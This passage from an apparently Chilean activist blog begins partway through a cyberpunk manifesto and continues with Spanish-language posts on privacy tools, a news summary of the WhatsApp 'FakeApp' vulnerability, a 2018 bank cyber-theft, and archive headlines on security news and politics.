ser controlada, espiada, vigilada ni monitorizada masivamente de forma general y en eso radica su poder. Cada hombre será independiente en la red, toda la información estará aquí, cerrada en el abismo de ceros y unos y el que consigue controlar su red, controlará su vida y su información. Actualmente vivimos en una mezcla del pasado y el presente, el mal proviene del hombre y el bien de la tecnología. La red controlará al pequeño individuo y nosotros debemos controlar nuestra red, nuestros movimientos, cada una de nuestras operaciones, trabajos y actividades en ella porque sólo así conseguiremos llegar a controlar nuestras vidas puesto que éstas sólo existirán en la red. Somos y seremos seres físicos, pero nuestra información es virtual y por tanto la mitad de nosotros mismos también lo debe ser. O de lo contrario, si no controlamos nuestra red, seremos controlados, fácilmente esclavizados y manipulados por 3eros, por las élites, por los gobiernos y empresas, y por ello, la información es poder.

V. ¿Dónde estamos?

Todos nosotros vivimos en un mundo enfermo, donde el odio, el egoísmo, el racismo, la ambición, la envidia, la codicia, la soberbia, el narcisismo y el orgullo son armas, tanto individuales como manipuladoras para controlar a la sociedad y las grandes masas y la paz humana una utopía cada vez más lejana e imposible de alcanzar. El mundo crece muy rápidamente y de forma exponencial, tanto que ya es difícil para un cyberpunk vivir en las eras modernas y subdesarrolladas, con gente manipulada y controlada alrededor suyo que creen en las mentiras y engaños de los gobiernos y empresas, e inclusive, las protejen y argumentan sus acciones intentando inútilmente de defenderlos. Nosotros vamos hacia adelante y ellos nos empujan hacia atrás. La sociedad nos suprime, se autodestruye, suprime su dignidad, suprime su privacidad, suprime su libertad de información, su libertad de expresión, de opinión, de prensa, conocimiento, pensamiento y se burla de sus propios derechos humillándose ante los poderes, controles y manipulaciones de las élites con crueles y despiadados programas de «educación» en escuelas y universidades donde se debe pagar por información manipulada, limitada, censurada y restringida. Adoctrinan a los niños con sus puntos de vista y castigan y niegan todo intento de pensar diferente por medio de la burla y la humillación. Nuestros hijos crecen educados en este viejo y aún no cambiado sistema que ha sido implementado durante los últimos miles de años. Un sistema que no tolera la libertad de información, la libertad de expresión, de opinión, de prensa, conocimiento, pensamiento y demanda una estricta obediencia a las reglas. Viviríamos en un mundo muy distinto de este si las personas hicieran escalones y no huecos. Es difícil vivir en este mundo para los cyberpunks. Vivimos en el lugar correcto, pero no en el tiempo correcto ya que no somos respetados y valorados de la forma correcta. Todo es tan ordinario, la gente es la misma, sus actos también lo son. Algunos intentan encontrar su propio lugar, su propio espacio, la comunidad cyberpunk, y encontrándolo, construyen su vida, crean sus propias leyes, crean sus pensamientos que cambian la realidad, se entregan a éstos y viven en las redes informáticas ocultas, profundas, anónimas y obscuras de la Internet underground compartiendo todos esos pensamientos, ideales y opiniones libremente con todos. Otros, en cambio, se acostumbran al mundo tal y como es. Ellos siguen viviendo en él, aunque no les guste. Ellos no tienen otra elección que esperar que el mundo se mantenga «bien», siga hacia adelante, y dentro de lo posible, llegue a mejorar algún día. Lo que nosotros intentamos hacer es cambiar la situación, estamos ajustando el mundo presente a nuestras necesidades y visiones, para adecuarlo a su máxima función y olvidar la basura. Cuando nosotros no podemos, simplemente vivimos en este mundo, como los cyberpunks, no importa lo difícil que sea, cuando luche la sociedad nosotros los contrarrestaremos. Nosotros construimos nuestras vidas en el ciberespacio, creamos nuestro propio código, nuestras propias leyes, nuestra propia ética. Un montón de ceros y unos, un montón de bits de información. Construimos nuestra comunidad, la comunidad de los cyberpunks.

¡Unidos luchemos por nuestros derechos!
Somos las mentes electrónicas, un grupo de rebeldes con pensamientos libres, cyberpunks.
Vivimos en el ciberespacio, estamos en todos los lugares y en ninguno al mismo tiempo, no tenemos límites, jerarquías, leyes ni líderes.
Este es nuestro manifiesto, el manifiesto cyberpunk.

52 comentarios

Borra tu información de Internet con solamente un botón

Publicada el 22/09/2018 por Anonymous Chile

Decir a estas alturas que Internet es un sitio maravilloso sería repetir una vez más algo que todos sabemos. Pero, todos alguna vez nos hemos querido marchar de un sitio por muy genial que fuese. El problema es que en Internet no teníamos una salida fácil, hasta ahora.

Los desarrolladores suecos Wille Dahlbo y Linus Unnebäck han creado Deseat.me, una aplicación web que ofrece una forma de borrar toda nuestra existencia de Internet en unos pocos clics. Una vez iniciamos sesión en el sitio web con una cuenta de Google o Outlook, analiza las aplicaciones y servicios para los que se ha creado una cuenta y crea una lista con todos ellos.

Cada una de las cuentas se empareja con un enlace de eliminación que lo que hace es redirigirnos a la página de cancelación del servicio. De esta forma en unos pocos clics podemos acabar con nuestros diversos servicios en la Red y, en alrededor de una hora, haber cancelado todos nuestros servicios.

En cuanto a la privacidad de nuestros datos se encuentran, en principio, a salvo. Hablo de “en principio” ya que la política de privacidad de la aplicación asegura que únicamente los datos de la cuenta que creamos para personalizar los anuncios que nos mandan y que no comparten nuestra información con ningún tercero.

Pero, todo en esta vida tiene un “pero”, se reservan el derecho a que el responsable de datos -denominado Writement en la legislación sueca- comparta esta información en caso de que la ley lo requiera o en caso de que los términos de la aplicación sean actualizados y el usuario los acepte expresamente.

En caso de que estés buscando acabar con tus perfiles en la Red porque estas cansado y quieres darte un respiro o empezar de nuevo, deberías tener en cuenta esta aplicación.

66 comentarios

«Yo en la web»: Google te alerta cuando alguien busca tu nombre

Publicada el 22/09/2018 por Anonymous Chile

Muchas veces te habrás planteado esta pregunta y, es muy posible, que como solución a ella hayas buscado tu nombre en Google. El resultado de esta búsqueda te habrá dado unos resultados, más o menos acertados, en función de la presencia social que tengas en la red.

Hoy en día con la cantidad de redes sociales que tenemos la página de resultados suele mostrarnos algunos de nuestros perfiles si no trabajas una tu marca en internet más allá. Sin embargo, es inevitable que por nuestra profesión u otra serie de motivos, en más de una ocasión nos haya podido nombrar en un artículo o mencionado ante cualquier debate.

Aunque para debate, el que se ha formado de hace un tiempo hasta aquí con el derecho al olvido en Google. Muchas personas consideran que no tienen porque aparecer como una serie de resultados en el buscador y que por tanto tienen derecho a que esas páginas de contenido sean desindexadas. Sin embargo, este post no trata sobre el derecho al olvido y puntos a favor o en contra aunque puede estar relacionado.

Crea una alerta en Google cuando alguien mencione tu nombre

Desde que surgió la polémica, Google ha estado trabajando por intentar ser más transparente y facilitar las cosas a los usuarios a la hora de controlar su presencia en Internet y cómo aparece en el buscador. Ahora, con el objetivo de seguir mejorando en esta dirección Google permite configurar una alerta para que nos llegue un correo electrónico cuando alguien escriba nuestro nombre en Internet o cualquier dato relacionado con nosotros. Este nueva herramienta ha sido bautizada como “Yo en la web” y nace como respuesta a las peticiones de muchos usuarios de tener un mayor control de cómo lo ven los demás en Internet.

Cómo configurar “Yo en la web” de Google

Siguiendo estos sencillos pasos, podrás configurar tantas alertas como quieras:

  1. Primero de todo asegúrate de que estás logueado con tu cuenta de Google. Es la misma que por ejemplo utilizas para Gmail.
  2. A continuación entra en “Yo en la web” a través de este enlace. Verás varias opciones con estadísticas de servicios de Google.
  3. La parte interesante la encontramos abajo a la derecha, entra en “Opciones de visualización”.
  4. En esta nueva ventana a la que has accedido se te mostrará la posibilidad de monitorizar tu nombre, así como otra serie de datos relacionas contigo.
  5. Si quieres recibir una alerta, tan sólo tienes que pulsar en “Crear Alertas” y configurar una nueva con la frecuencia de aviso.

Cómo ves de forma sencilla es posible monitorizar cuando se publica algún artículo o similar donde aparezca el dato que hemos configurado en la alerta. De esta forma, podemos tener un mayor control de lo que se dice de nosotros en Internet

18 comentarios

‘RetroShare’: el sistema P2P y F2F anónimo, descentralizado y seguro

Publicada el 22/09/2018 - 06/10/2021 por Anonymous Chile

Hoy en día, nos encontramos ante la situación de que, aunque queramos compartir algo con nuestros amigos por Internet, siempre hay “alguien” en medio.

Las aplicaciones de mensajería instantánea, los clientes de correo electrónico, las redes sociales… todos tienen un servidor intermedio por el que la información debe pasar antes de llegar a su destinatario.

El riesgo aumenta si hablamos de redes de intercambio de archivos (P2P), en las cuales no tenemos control alguno sobre con quién compartimos la información ni tenemos forma de verificar la autenticidad y limpieza de los datos que recibimos. Frente a dicha problemática ha nacido RetroShare.

RetroShare es una herramienta multiplataforma de código libre escrito en el lenguaje de programación Qt 4 para redes de comunicación P2P con cifrado de extremo a extremo y soporte en múltiples medios como foros, blogs, BBS, correo electrónico, compartición de archivos y mucho más, todo integrado e incorporado dentro del mismo cliente.

RetroShare establece conexiones cifradas (OpenSSL) entre amigos, los cuales autenticamos mediante certificados PGP. Es, por tanto, una red F2F (friend-to-friend), un tipo particular de P2P anónimo en donde la gente se conecta directamente con sus “amigos”. Los datos sólo se envían a tus amigos y, en algunos casos, estos pueden reenviárselos a sus amigos, lo que convierte a RetroShare en una red social privada y descentralizada sin servidores de por medio.

Entre sus funciones encontramos:

  • Chat: Podemos enviar texto e imágenes como si de una aplicación de mensajería se tratara. También, podemos discutir con varias personas en las diferentes salas de chat.
  • Voz y vídeo: Permite realizar llamadas gratuitas y seguras gracias a VoIP.
  • Correo: Tiene la posibilidad de enviar mensajes cifrados a otros miembros de la red. Además, almacena los mensajes en los nodos amigos para entregarlos aunque estemos fuera de línea.
  • Compartir archivos: Ya sea con nuestros amigos o con toda la red que tengamos. Utiliza enjambres similares a BitTorrent para acelerar la transferencia de información, permitiendo así compartir archivos grandes de varios gigabytes.
  • Foros: Puedes leer y escribir publicaciones en foros sin conexión. Cuando tengamos conexión a Internet, Retroshare sincronizará automáticamente los foros con nuestros amigos. Los foros descentralizados son resistentes a la censura por diseño.
  • Canales: Podemos publicar archivos en canales, suscribirnos a los mismos y descarga automáticamente los últimos archivos.
  • Protege tú dirección IP con TOR y todo tipo de redes de P2P anónimo, tales sean I2P o Freenet, ya que RetroShare es perfectamente adaptable a todas ellas. De este modo, la conexión entre nosotros y nuestros amigos se mantiene oculta y anónima en tales redes.

2.704 comentarios

Chile modernizará sus protocolos de ciberseguridad tras el robo de 8,5 millones de euros a manos de ciberdelincuentes

Publicada el 22/09/2018 - 22/09/2018 por Anonymous Chile

Las autoridades de Chile modernizarán los protocolos de ciberseguridad del país después de que un grupo de ciberdelincuentes robase 10 millones de dólares (8,5 millones de euros) del Banco de Chile el pasado mes de mayo.

La medida ha sido adoptada por representantes del Ministerio de Hacienda, la Superintendencia de Bancos, el Banco Central y el regulador del mercado local después de lo que se supuso uno de los mayores ciberataques sufridos en la historia de la nación.

“Se van a revisar las mejores prácticas en materia de ciberseguridad para prevenir y responder frente a estos ataques”, ha indicado el ministro de Hacienda chileno, Felipe Larraín.

El 24 de mayo, un grupo de ciberdelincuentes atacó al Banco de Chile, la segunda mayor entidad financiera del país, y extrajo cerca de 10 millones de dólares, de los que una gran parte terminó en diversas cuentas en Hong Kong.

Durante el ciberataque, el Banco de Chile se vio obligado a desconectar unas 9.000 estaciones de trabajo en sus sucursales en un intento por frenar la propagación del virus, que habría servido de distracción para sustraer el botín.

Según un análisis forense de Microsoft, se trató de un ataque internacional sofisticado posiblemente proveniente de algún país de Europa del Este o Asia, tal y como ha explicado el Banco de Chile, controlado por la familia local Luksic y el estadounidense Citigroup.

Por otra parte, las autoridades han insistido en la necesidad de que el Congreso apruebe lo antes posible una nueva ley que permita contar con mejores herramientas y más capital para cubrir riesgos operacionales, incluidos los de ciberseguridad.

140 comentarios

FakeApp, la nueva vulnerabilidad de WhatsApp

Publicada el 22/09/2018 - 03/08/2021 por Anonymous Chile

Los investigadores de Check Point Dikla Barda, Roman Zaikin y Oded Vanunu han descubierto una vulnerabilidad, FakeApp, que permite saltarse el cifrado de los mensajes, interceptar y manipular los mensajes enviados tanto en conversaciones privadas como de grupo.

¿Es grave? Sí. ¿Me afecta? Raro sería que no seas usuario de WhatsApp. ¿Qué puede pasar? Esta vulnerabilidad puede multiplicar los casos de engaños y estafas además de comprometer la seguridad de las personas que comparten datos sensibles a través de ella.

¿Cómo funciona FakeApp?

La vulnerabilidad consta de tres partes:

  • Se puede editar el mensaje enviado de una persona para que el receptor crea que el emisor ha escrito mensajes distintos de los enviados por el mismo.

  • Se puede utilizar la función de “citar” en una conversación de grupo para cambiar la identidad del remitente, incluso si esa persona no es miembro del grupo, suplantando así su identidad en dicho grupo.

  • Se puede enviar un mensaje a un miembro de un grupo de forma que parezca un mensaje del grupo pero en realizad sólo puede ser visto por el respectivo integrante del grupo en disputa. En cambio, su respuesta será vista por todos los miembros del grupo.

Aquí el video explicatorio, en inglés, de Check Point:

Por si esto fuera poco, los investigadores decidieron realizar ingeniería inversa sobre el cifrado de WhatsApp y se llevaron una sorpresa. Una vez que capturaban el tráfico se lo enviaban a la extensión web que habían creado para descifrar todo el tráfico de WhatsApp al igual como volverlo a cifrar.

Esto se debe a que han descubierto que la clave pública se puede obtener en la fase de generación de claves de WhatsApp Web antes de generar el código QR y, posteriormente, se toma el parámetro “secret” que envía el teléfono móvil a WhatsApp Web mientras el usuario escanea el código QR y ya se tienen la clave pública y privada de la sesión de WhatsApp.

La herramienta que han publicado está disponible en GitHub y los detalles técnicos se encuentran en su blog.

¿Cómo puedo protegerme?

Mientras WhatsApp corrige la vulnerabilidad debemos:

  • Extremar las precauciones con todos los enlaces que recibimos.
  • Utilizar el sentido común.
  • No enviar datos sensibles por la aplicación.

Bueno, esos consejos sirven para todos los servicios de Internet que uses. Úsalos siempre.

Autistici & Disroot: Los mejores servicios de comunicaciones seguras y cifradas al alcance de un click

Publicada el 22/09/2018 por Anonymous Chile

Las revelaciones de Edward Snowden sobre PRISM, X-Keyscore y muchas otras operaciones de espionaje lanzados por gobiernos y empresas con el objetivo de controlar a la raza humana y todo el Planeta Tierra, han puesto de manifiesto la necesidad de mejorar la privacidad en nuestras vidas al estar sometidos a tantos programas de vigilancia a cada minuto. Frente a esto, cientas de agrupaciones se han lanzado apostando por desafiar dichas operaciones, poner en juego sus estrategias y metodologías utilizadas y recuperar los derechos humanos que tan despiadadamente nos han arrebatado, por lo cual en consecuencia ahora nosotros en esta presentación expondremos los últimos y más interesantes proyectos que ofrecen las medidas más avanzadas para mejorar diferentes aspectos de la seguridad de nuestra información y comunicaciones del día a día de múltiples formas distintas.

Autistici:

Autistici es una plataforma de origen italiano que busca reclamar espacios en la red donde se pueda discutir y trabajar en dos niveles: por un lado, el derecho y la necesidad de comunicaciones libres, privadas y el acceso a los recursos digitales; y por el otro, aquellos proyectos relacionados con la realidad y luchas sociales. En Autistici se considera que la comunicación debe ser libre, gratuita y universalmente accesible. Para ello, defienden la autonomía colectiva para obtener un trabajo eficiente colaborando proactivamente y de forma equitativa, como por ejemplo creando y manteniendo sus propios servidores con centro de datos dedicado y privado para el proyecto en disputa en donde ofrecen múltiples servicios de todo tipo para, tanto comunidades como particulares, activistas, informantes, criptoanarquistas, defensores de los derechos humanos, luchadores por la libertad y la privacidad.

De esta forma, en Autistici aseguran que manteniéndose fuera del circuito y del radar comercial de los servicios de pago, están felices y siempre disponibles para acoger a todos los agitadores que luchan infatigablemente contra la censura de información, expresión, comunicación, conocimientos, mediática, cultural y la globalización de un imaginario preconfeccionado y empaquetado mundo y ser humano, que pasa a diario por ser el único posible.

En consecuencia, ninguno de los servicios que proveen están dirigidos, directa o indirectamente, para actividades comerciales, para ser usados por religiones, partidos políticos o, para decirlo rápidamente, por cualquiera que ya tiene medios y recursos para difundir ampliamente sus ideas, o quienes hacen uso del concepto de representación y delegación, explícita o implícitamente, en sus relaciones y proyectos del día a día.

En Autistici se garantiza que no conservan ningún tipo de registros, que no requieren de información personal para acceder a cualquiera de sus servicios, y que harán todo lo que puedan para mantener su reenviador anónimo de correos electrónicos, anonimizadores y todo lo demás que mantiene la privacidad y confidencialidad de las comunicaciones. El saber, el conocimiento, la información, la comunicación y los recursos que les rodean crecen a través del intercambio mutuo. Por ello impulsan la distribución completamente libre, sistemática y organizada de material cultural, luchando de esta forma contra el copyright tradicional, apoyamos, promovemos, defendemos y soportamos la adopción de softwares de código abierto y 100% libre.

Autistici es la parte que intenta buscar vías de trasladar al mundo digital aquellas cuestiones que son parte de luchas y organizaciones sociales, buscando superar los límites, restricciones y estreñimientos de la realidad (por ejemplo, una asamblea puede ser reproducida en una lista de correo, lo que la convierte en algo perpetuo, permanente y omnipresente). Autistici parte de una base técnica y de la pasión por conocer las herramientas técnicas y las políticas que llevan implícitas; incluso si el software se crea en un mundo virtual ello no significa que no tenga un impacto en el mundo real. Partiendo de las herramientas técnicas que usan han llegado a desarrollar un conjunto de demandas políticas específicas, desde el terreno digital al ámbito real.

Junto a esto, piensan que los medios de comunicación no deben estar exclusivamente en manos de profesionales de la información. Creen en el valor de la autoproducción y autogestión: esta es la razón por la que no tienen patrocinadores ni financiación de ningún tipo, aparte de las donaciones voluntarias de aquellas personas que creen que nuestro proyecto es importante y debe sobrevivir. Los aspectos técnicos y políticos de nuestros servidores, servicios y proyectos se discuten de la forma más transparente y horizontal que sea posible a través de una lista de correo. No tienen coordinador/a, voceros ni hacen votaciones.

Disroot:

Disroot es un proyecto radicado en Amsterdam, Holanda, mantenido por voluntarios y que depende del apoyo de su comunidad. Originalmente, Disroot se creó por necesidades personales, aseguran sus fundadores que buscaban softwares, medios y plataformas que pudiesen utilizar para comunicarse, compartir y organizarse dentro de sus círculos. La mayoría de las soluciones disponibles carecían de los elementos claves que ellos consideraban importantes: sus herramientas debían ser abiertas, descentralizadas, federadas y respetuosas de la libertad, el anonimato, los derechos humanos y la privacidad.

Mientras buscaban tales herramientas, encontraron algunos proyectos realmente interesantes, proyectos que creyeron que deberían estar disponibles para cualquiera que valore principios similares. Por lo tanto, decidieron reunir algunas aplicaciones y compartirlas con otros. Así es cómo Disroot empezó.

Con el funcionamiento de Disroot esperan cambiar la manera en que la gente habitualmente se comunica e interactúa en la web. Quieren alentar a las personas a liberarse de los «jardines vallados» del software popular, de código privativo, softwares espía y cambiar a alternativas abiertas, libres, descentralizadas y éticas, ya sea en su plataforma o en otra, o incluso permitir al usuario hospedar la suya propia. De este modo, juntos y en la actualidad aseguran que pueden formar una red que sea verdaderamente independiente, enfocada en el beneficio de la gente en lugar de explotarla.

  • Federación y descentralización:

La mayoría de los servicios de Internet funcionan desde un punto centralizado, controlado y operado por corporaciones. Éstas almacenan información privada de sus usuarios y la analizan utilizando algoritmos avanzados con el fin de crear perfiles precisos de sus ‘usuarios’. Esta información es usada habitualmente para aprovecharse de la gente en beneficio de los anunciantes. Son datos que también pueden obtener instituciones gubernamentales o hackers malintencionados. La información incluso puede ser quitada sin aviso, por razones dudosas o políticas regionales de censura.

Un servicio descentralizado puede residir en varias máquinas, propiedad de diferentes individuos, compañías u organizaciones. Con protocolos de federación, esas instancias pueden interactuar y formar una red de muchos nodos (servidores que hospedan servicios similares). Uno podría dar de baja un nodo pero nunca la red entera. Con este tipo de organización, la censura es prácticamente imposible.

Pensemos en cómo utilizamos el correo electrónico: puedes elegir cualquier proveedor de servicio o armar el tuyo propio, y aún así intercambiar correos con personas que usen otro proveedor de correo. El correo electrónico está construido sobre un protocolo descentralizado y federado.

Estos dos principios, juntos, constituyen la base de una enorme red que depende de una estructura bastante simple y con costos relativamente bajos. Cualquier máquina puede convertirse en un servidor y ser un participante semejante en la red. Desde una pequeña computadora de escritorio en tu casa hasta un servidor dedicado o racks con múltiples servidores. Este abordaje proporciona la posibilidad de crear la más grande red global perteneciente a los usuarios. Tal como fue planeado que fuese la Internet desde sus inicios.

De esta forma, los administradores de Disroot garantizan que no permitirán que su plataforma se convierta en una entidad centralizada y jamás será objeto del imperialismo, mercantilismo y capitalismo mundial, no pondrán en riesgo la privacidad y datos personales de sus usuarios ni se dejará manipular por el poder, la ambición, la avaricia y la codicia del ser humano en la Tierra; sino que muy por el contrario a todo esto, Disroot es y siempre será una parte de una comunidad más grande, un nodo entre muchos en donde poder comunicarse libremente y de forma segura, compartir información y expresar ideas sin control de las autoridades, y con esto también incitan a que otros se sientan inspirados y estimulados a crear más proyectos con similares intenciones.

  • Privacidad:

El software puede ser creado, darle cualquier forma, modificarlo, moldearlo a gusto de cada uno, compartirlo libremente y aprender de tod el proceso permitiendo así que otros conozcan el software creado, se nutran de los conocimientos aplicados y realicen también sus aportes, contribuciones y colaboraciones incondicional, ilimitada y desinteresadamente sin esperar nada más excepto el promover las mismas ideologías de libertad, compartir, contribuir y aportar a una comunidad que se hace a cada minuto más grande. Cada botón, cada color y cada enlace que vemos y utilizamos en la web fue puesto ahí por alguien. Cuando hacemos uso de las aplicaciones que nos ofrecen, generalmente no vemos – y a veces no nos interesa – mucho de lo que ocurre detrás de la interfaz que utilizamos. Nos conectamos con otra gente, almacenamos nuestros archivos, organizamos reuniones y festivales, enviamos correos o chateamos durante horas y todo sucede, para nosotros o a los ojos del usuario, «mágicamente». En las últimas décadas la información se ha vuelto muy valiosa y más y más sencilla de recopilar, procesar, exponer, publicar, compartir y comerciar permitiendo así un sin fin de posibilidades, opciones y trabajos posibles que se pueden realizar sobre dicha información, aprender de ella, modificarla y beneficiarse o perjudicarse a si mismo o a otros del modo que sea y obteniendo también un poder cada vez mayor por sobre dicha información y lo que se puede hacer con ella. Estamos acostumbrados a ser analizados, aceptando ciegamente términos y condiciones por «nuestro propio bien», confiando en autoridades y compañías multimillonarias para que protejan nuestros intereses, mientras todo el tiempo somos el producto en sus ‘granjas de personas’.

Con ello, los fundadores y administradores de Disroot invitan a sus usuarios, internautas y todo público de la Internet a que cada uno de nosotros seamos dueños de nuestra información ya que, según manifiestan, muchas redes usan nuestros datos para hacer dinero analizando nuestras interacciones y utilizando esta información para publicitarte cosas. Disroot se compromete a no hacer nada de eso ni a utilizar nuestros datos con ningún otro propósito que no sea permitir acceder a la plataforma y usar el servicio. Nuestros archivos en la nube están cifrados con tu contraseña de usuario, cada texto anónimo en línea y fichero subido al servicio Lufi está cifrado del lado del cliente también, lo que significa que ni siquiera los administradores del sistema tienen acceso a nuestra información privada y datos personales. Siempre que exista una posibilidad para cifrar, la habilitamos y si no es posible, se aconseja y recomienda firmemente utilizar un software de cifrado externo.

  • Transparencia y sinceridad:

En Disroot se utiliza software 100% libre y de código de abierto. Esto significa que el código fuente (la forma en que opera el software) es de acceso público. Cualquiera está en condiciones de contribuir con mejoras o ajustes al software y éste puede ser auditado y controlado en cualquier momento, sin puertas traseras ocultas u otro software malicioso.

Aseguran tener la disponibilidad para ser completamente transparentes y abiertos con las personas que utilizan sus servicios y por ello publican información sobre el estado actual del proyecto, la condición financiera, nuestros planes e ideas. También están abiertos a escuchar todas las ideas, sugerencias, opiniones, colaboraciones, aportes, criticas y comentarios para así poder dar la mejor experiencia posible a todos sus usuarios y mantener también la plataforma a cada día con más vida, encanto y servicios disponibles de la forma más completa, rápida, accesibles y fáciles de usar.

3 comentarios

Qwant, el motor de búsqueda que respeta tu privacidad

Publicada el 19/08/2018 - 29/06/2021 por Anonymous Chile

El nombre “Qwant” proviene de la unión de la “Q” de “Quantity” (cantidad), que se refiere la gigantesca cantidad de datos que nuestros rastreadores procesan cada día, con la contracción de la palabra inglesa “wanted” (querer en inglés).

Qwant es una buscador web francés de código libre fundado en 2011 por Éric Leandri, especialista en seguridad; Jean Manuel Rozan, inversor; y Patrick Constant, experto en motores de búsqueda. Se encuentra alojado en Francia y tiene sus servidores repartidos entre París, Niza y Rouen.

Su filosofía es la garantizar la privacidad, defender la neutralidad de la red, proteger la descentralización, la libertad, los derechos humanos, la transparencia de información, el anonimato en Internet y la imparcialidad.

Cuando hacemos una búsqueda, no instalan ninguna cookie, software ni inyectan código en nuestro navegador o computadora que permita rastrearnos. No recopilan ni almacenan ningún historial, ningún tipo de información sobre el usuario, datos personales ni búsquedas realizadas. Nuestra consulta se anonimiza instantáneamente al ser disociada de nuestra dirección IP, de acuerdo con lo que aconseja el responsable de protección de datos francés (« Informatique et Libertés » du 7 janvier 1978). Funciona exclusivamente con el protocolo HTTPS.

Su fuente de ingresos viene a través de anuncios ofrecidos por Microsoft Bing Ads basados en las palabras clave de búsqueda.

En caos de creamos una cuenta en Qwant, se recogerá la información mínima necesaria para acceder a todos sus servicios (tableros y favoritos y también ajustes de la cuenta Qwant) y únicamente se compartirá con terceros en caso de que apliquemos a algún trabajo. Al hacer una búsqueda, aparte de los resultados comunes, nos aparecerán las redes sociales. También incorpora un indexador de noticias y un buscador de música. Posee un buscador adaptado para niños y una versión Lite. Cuenta con aplicaciones para Android y iOS adaptadas al español.

¿Cómo ejecuto mi “derecho al olvido”?

Para ejercer el susodicho en disputa debemos rellenar los siguientes formularios:

  • Formulario ODT (Puede ser abierto con Microsoft Word).
  • Formulario PDF (Para abrirse mediante Adobe Acrobat Reader).

Una vez rellenado, debe enviarse junto con los anexos requeridos a privacy@qwant.com.

Archivos

  • Hackers instalan backdoor en Microsoft SQL Server14/03/2022
    Algunos servidores vulnerables de Microsoft SQL orientados a Internet están siendo atacados por actores de amenazas como parte de una nueva campaña para la implementación de cargas Cobalt Strike en hosts comprometidos. Esta campaña incluye ataques de fuerza bruta y ataques de diccionario contra servidores mal administrados, según reporta la... Lee más: Hackers instalan backdoor en Microsoft SQL Server
  • Vulnerabilidad LPE en sistemas GNU/Linux mediante snap-confine11/03/2022
    Especialistas en ciberseguridad de la firma Qualys detallan la detección de múltiples vulnerabilidades en el sistema de implementación y empaquetado de Snap. Según el reporte, las fallas residen en la función de confinamiento rápido en los sistemas operativos Linux y su explotación maliciosa permitiría a los actores de amenazas realizar... Lee más: Vulnerabilidad LPE en sistemas GNU/Linux mediante snap-confine
  • Perspectiva sistémica de la crisis ucraniana10/03/2022
    Quizás habría que comenzar estas breves notas partiendo de hacer explícita una consigna: el imperialismo es imperialismo con independencia de si la potencia que lo practica es Estados Unidos, Francia, China o Rusia. Hoy, en medio de la que probablemente es la campaña mediática más grande en la historia de... Lee más: Perspectiva sistémica de la crisis ucraniana
  • ZeroFox reporta poderosa botnet capaz de infectar y controlar millones de dispositivos rápidamente09/03/2022
    El grupo de investigación de ZeroFox Intelligence descubrió una nueva botnet que, si bien parece seguir en fase de desarrollo, cuenta con avanzadas capacidades para la ejecución de cargas útiles, ejecución de comandos shell y registro de las pantallas de los dispositivos afectados. Identificada como Kraken, la botnet usa el... Lee más: ZeroFox reporta poderosa botnet capaz de infectar y controlar millones de dispositivos rápidamente
  • La huelga feminista transformó el movimiento social de Chile08/03/2022
    La dinámica entre la movilización callejera y la Convención Constitucional, la autonomía con respecto al gobierno que asumirá el próximo 11 de Marzo y las demandas urgentes, porque «está en peligro la vida», son algunas de las tantas acciones que bullen en un «momento fundante», y también en la construcción... Lee más: La huelga feminista transformó el movimiento social de Chile
  • Vulnerabilidad RCE en Apache Cassandra07/03/2022
    Esta semana se publicó un informe técnico completo sobre una vulnerabilidad crítica de ejecución remota de código (RCE) recientemente corregida en Apache Cassandra, una base de datos NoSQL distribuida que ofrece alta escalabilidad muy popular entre compañías como Cisco, Netflix, Reddit, Twitter, Urban Airship, OpenX y más. Identificada como CVE-2021-44521,... Lee más: Vulnerabilidad RCE en Apache Cassandra
  • Vulnerabilidades día 0 en Google Chrome afectan a millones de usuarios04/03/2022
    Google ha emitido una actualización para usuarios de Chrome en sistemas operativos Windows, Linux y macOS con el fin de abordar una vulnerabilidad día cero que podría haber sido explotado activamente por hackers maliciosos, además de abordar otras vulnerabilidades severas que afectan a todas las versiones del popular navegador. Si... Lee más: Vulnerabilidades día 0 en Google Chrome afectan a millones de usuarios
  • Contra la guerra y el militarismo: Resolución del congreso fundador de la AIT (1922)03/03/2022
    El militarismo es el sistema de violencia monopolística del Estado con el propósito de defender y expandir el teatro nacional de explotación (guerra defensiva o guerra de agresión), para poner bajo control nuevos teatros de explotación (guerra colonial) y para reprimir con dureza a las masas populares rebeldes (huelgas, disturbios,... Lee más: Contra la guerra y el militarismo: Resolución del congreso fundador de la AIT (1922)
  • Ataques DDoS afectan dispositivos PLC de Siemens02/03/2022
    En su más reciente alerta de seguridad, Siemens anunció el lanzamiento de parches para abordar múltiples vulnerabilidades críticas cuya explotación permitiría bloquear de forma remota algunos modelos de controladores lógicos programables (PLC). La compañía corrigió un total de 27 vulnerabilidades, tres de las cuales podrían ser explotadas por actores de... Lee más: Ataques DDoS afectan dispositivos PLC de Siemens
  • Familia Kast posee derechos de agua equivalentes al consumo diario de 100 mil personas01/03/2022
    En su programa de gobierno, el candidato ultraderechista asegura que van a priorizar “el consumo humano a través de la cobertura de agua potable para toda la población”. Desde el comando de Kast no indicaron si entregarían o no derechos de aprovechamiento de privados para garantizar el recurso a todos.... Lee más: Familia Kast posee derechos de agua equivalentes al consumo diario de 100 mil personas
  • Vulnerabilidad RCE en Android 12 afecta a millones de dispositivos y teléfonos móviles28/02/2022
    La más reciente actualización del sistema operativo Android incluye un parche para una vulnerabilidad crítica identificada como CVE-2021-39675 que reside en el componente System y podría ser explotada para obtener acceso remoto o realizar ataques de escalada de privilegios en los dispositivo afectados. Aunque la compañía no ha revelado amplios... Lee más: Vulnerabilidad RCE en Android 12 afecta a millones de dispositivos y teléfonos móviles
  • Estructura y manejo de usuarios, contraseñas y grupos en GNU/Linux25/02/2022
    Estudiando y analizando la estructura y manejo de ficheros /etc/passwd, /etc/shadow y /etc/group en sistemas GNU/Linux Es un archivo que almacena información esencial que se requiere durante el inicio de sesión en sistemas GNU/Linux. Dicho de otra manera, ahí se va a almacenar información relativa a las cuentas de usuarios.... Lee más: Estructura y manejo de usuarios, contraseñas y grupos en GNU/Linux
  • Ecuador hacia una nueva ley de libertad de prensa, opinión y expresión24/02/2022
    Ecuador está por eliminar la legislación que permitió el hostigamiento y sanciones a periodistas durante nueve años. Una nueva propuesta de ley para la libertad de prensa, opinión y expresión se está debatiendo en la Asamblea Nacional. ¿Cuáles son los principales elementos de este proyecto? ¿Dónde queda el componente digital?... Lee más: Ecuador hacia una nueva ley de libertad de prensa, opinión y expresión
  • Monitorización y administración de redes con pfSense23/02/2022
